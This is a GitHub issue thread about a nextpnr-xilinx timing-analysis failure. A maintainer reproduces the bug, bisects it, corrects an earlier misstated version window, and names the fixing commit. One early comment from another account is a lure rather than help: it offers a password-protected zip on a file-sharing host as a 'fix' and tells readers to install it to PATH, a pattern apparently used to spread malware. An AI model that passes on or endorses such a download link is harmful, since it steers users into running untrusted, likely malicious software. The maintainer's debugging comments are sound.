openXC7/nextpnr-xilinx #40: nextpnr cant route design, Vivado works - ERROR: timing analysis failed due to presence of combinatorial loops, incomplete specification of timing ports, etc.

mirekez, 2024-08-26:
[ERROR_timing_analysis_failed_due_to_presence_of_combinatorial_loops_incomplete_specification_of_timing_ports.zip](https://github.com/user-attachments/files/16752006/ERROR_timing_analysis_failed_due_to_presence_of_combinatorial_loops_incomplete_specification_of_timing_ports.zip)

uno-zero, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

hansfbaier, 2026-09-19:
Verified fixed — closing.

I could not reproduce this on any current build, and I *did* reproduce the original failure on the code that was current when it was filed, so this is a genuine fix rather than a lucky placement.

**Repro setup.** Your own netlist from the issue zip, byte-identical (`TestPipeline.json` md5 `cd288e906d33585645f6898eea9a82cd`), part `xc7a100tcsg324-2`, your exact command line:

    nextpnr-xilinx --chipdb xc7a100tcsg324.bin --xdc TestPipeline.xdc --json TestPipeline.json --fasm TestPipeline.fasm

**Failure reproduced on the 2024 stack.** Built nextpnr-xilinx at `bd7a3861` (2024-08-21, current when reported) plus a chipdb written by that revision's own `bbaexport.py`/`bbasm` from the 2024-era prjxray-db:

* exit `255`, and the identical error: `ERROR: timing analysis failed due to presence of combinatorial loops, incomplete specification of timing ports, etc.`
* your log names **11** nets the timing walk could not resolve — `modules_7._mem_ext_R0_data[…]`, driven by `modules_7.mem_ext.Memory.0.*/DPR*.O6`. My 2024 run produced the same 11.

**Current state — passes on every build I can run.**

| build | result |
|---|---|
| 0.9.6 (released) | exit 0, FASM written, `Max frequency for clock 'modules_0.clock': 230.10 MHz (PASS at 12.00 MHz)` |
| current `main` (`d486d8ef`) | exit 0, same numbers |
| 0.9.5 / 0.9.4 / 0.9.3 / 0.9.2 | exit 0, FASM written |
| 0.9.6 + chipdb built from the 2024-era prjxray-db | exit 0 |

The decisive difference is the timing walk itself: **0 unresolvable fanin nets** now, against 11 then; and the distributed RAM is properly emitted — the design's `DPR` cells pack into `SLICE_LUTX` and the bitstream carries the LUT-RAM configuration (376 `SLICEM_X0` features, e.g. `CLBLM_R_X55Y99.SLICEM_X0.ALUT.RAM`).

**What fixed it.** Not yet pinned to a single commit, but the window is narrow. I built and tested the plausible candidates and each still fails identically on your design: `70e5d369` (*timing: skip cell self-loop arcs in the timing walk*), `c7d9d5b1` (*no timing arc through unused shared pins of fractured LUTs*), `9ec2b030` (*RAM128/256X1S distributed-RAM packing*, 2026-05-29 — still reproduces) and `b649145a` (*pack_dram: propagate parent BEL to RAM32M/RAM64M DPR subcells*, 2026-07-13). Since 0.9.2 (2026-08-02, `c13fcbf6`) passes, the fix landed in **2026-05-29 … 2026-08-02**; I will add the exact commit here once I have narrowed it further.

Thanks for the well-prepared repro — the pre-synthesised JSON plus the full log made this straightforward to check.

closed 2026-09-19 by hansfbaier

hansfbaier, 2026-09-19:
Correction to the window I gave above, from a follow-up bisect — the earlier figure was wrong.

I wrote that the fix landed in 2026-05-29 … 2026-08-02 because 0.9.2 passed. That "0.9.2" was the `0.9.2-sdp72-fix` build, which is *patched* and not the release; the plain 0.9.2 revision reproduces the bug:

* `c13fcbf6` (= the `0.9.2` tag, "Merge pull request #103") + its own era chipdb → **exit 255, `ERROR: timing analysis failed due to presence of combinatorial loops …`** (same 11 unresolved fanin nets).
* Everything from `9ec2b030` (2026-05-29) up to and including `c13fcbf6` likewise reproduces, each with a self-built binary and a chipdb written by that revision's own `bbaexport.py`/`bbasm`.
* 0.9.3, 0.9.4, 0.9.5, 0.9.6 and current `main` (`d486d8ef`) all pass.

So the fix is **after 0.9.2**, i.e. somewhere in `c13fcbf6` … `0.9.3` (2026-08-02 → 2026-08-18); a bisect of that window is running and I will name the commit here when it finishes.

hansfbaier, 2026-09-19:
Bisect result — the fixing commit is `f6e06896`.

    f6e06896 2026-08-08 timing: ignore combinational loops by default, warn instead of failing
    common/timing.cc | 15 insertions(+), 2 deletions(-)

`f3c8f84d` (its parent) is the last revision that still reproduces; 0.9.3 (`68aeeb39`) is the first release containing it. Every probe was a binary built from that revision plus a chipdb written by that same revision's `bbaexport.py`/`bbasm`:

| revision | result |
|---|---|
| `9ec2b030` … `c13fcbf6` (= 0.9.2) | reproduces — exit 255, 11 unresolved fanin nets |
| `f3c8f84d` | reproduces |
| **`f6e06896`** | passes |
| `68aeeb39` (= 0.9.3) … `d486d8ef` (= main) | passes |

The mechanism is worth stating precisely, because it is *not* "the timing graph became complete": the commit makes the analyser ignore combinational loops by default (`timing/ignoreLoops` now defaults to true) and warn instead of failing — in the author's words, such loops "are typically artifacts of the carry-O relocation / spine relinking structure, do not change the bitstream, and are present in several open-flow designs that otherwise place and route cleanly". Strict behaviour is still available with `timing/ignoreLoops=false` (or by re-synthesising without `abc9`). For this design that is the difference between "cannot route" and a bitstream: it now routes, timing analysis reports `Max frequency for clock 'modules_0.clock': 230.10 MHz (PASS at 12.00 MHz)`, and the FASM is written.

Thanks again for the repro — the pre-synthesised JSON plus the full log made a clean bisect possible.